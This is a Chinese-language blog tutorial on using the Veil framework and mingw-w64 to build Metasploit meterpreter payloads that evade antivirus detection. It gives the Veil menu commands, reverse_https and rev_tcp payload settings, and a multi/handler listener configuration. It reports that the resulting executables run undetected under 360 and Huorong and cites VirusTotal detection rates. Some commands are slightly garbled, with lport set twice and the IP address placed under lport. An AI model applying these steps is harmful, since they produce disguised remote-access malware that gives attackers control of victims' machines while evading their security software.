Veil免杀(VT免杀率23/71) (2)

Veil免杀(VT免杀率23/71)

然后再设定好生成的payload的名称,我这里就用go_msf了

Veil免杀(VT免杀率23/71)

然后一堆编码编译之后,就生成payload了

Veil免杀(VT免杀率23/71)

因为之前已经做过映射,所以在宿主机的/tmp/veil-output/compiled/目录可直接看到生成的exe文件。

在msf中监听

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_httpsmsf5 exploit(multi/handler) > set lport 3334msf5 exploit(multi/handler) > set lport 10.211.55.2msf5 exploit(multi/handler) > exploit

在测试主机执行go_msf.exe,发现msf中可上线

Veil免杀(VT免杀率23/71)

而此时是正常打开360和火绒的

Veil免杀(VT免杀率23/71)

virustotal.com中44/71个报毒

Veil免杀(VT免杀率23/71)

虽然查杀率还比较高,不过火绒和360都能静态+动态免杀。比较遗憾的是生成的exe文件比较大,go语言生成的exe大约2M,python生成的exe大约4M,ruby生成的exe大约700K,相比msf原生态的exe大打多了。

使用veil+mingw+w64(VT查杀率23/71)

先用veil生成shellcode

# veiluse 1                        #选择使用 Veil-Evasion 模块Veil-Evasion Menu    41 payloads loadedAvailable Commands:    back            Go to main Veil menu    checkvt         Check virustotal against generated hashes    clean           Remove generated artifacts    exit            Exit Veil    info            Information on a specific payload    list            List available payloads    use             Use a specific payloadVeil-Evasion command: use 7        #选择payload  c/meterpreter/rev_tcp.py[cs/meterpreter/rev_tcp>>] set LHOST 10.211.55.2[cs/meterpreter/rev_tcp>>] set LPORT 3333[cs/meterpreter/rev_tcp>>] generate

Veil免杀(VT免杀率23/71)

输入生成文件名为c_msf

Veil免杀(VT免杀率23/71)

先生成一个可以被 msf 利用的 c_msf.c 然后用mingw-w64 来编译

mingw-w64的安装可参考https://zhuanlan.zhihu.com/p/76613134

Veil免杀(VT免杀率23/71)

全程开启360卫士和杀毒以及火绒,编译、运行、上线都没有问题。

Veil免杀(VT免杀率23/71)

virustotal.com中23/71个报毒

Veil免杀(VT免杀率23/71)

小结

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/zwgdgz.html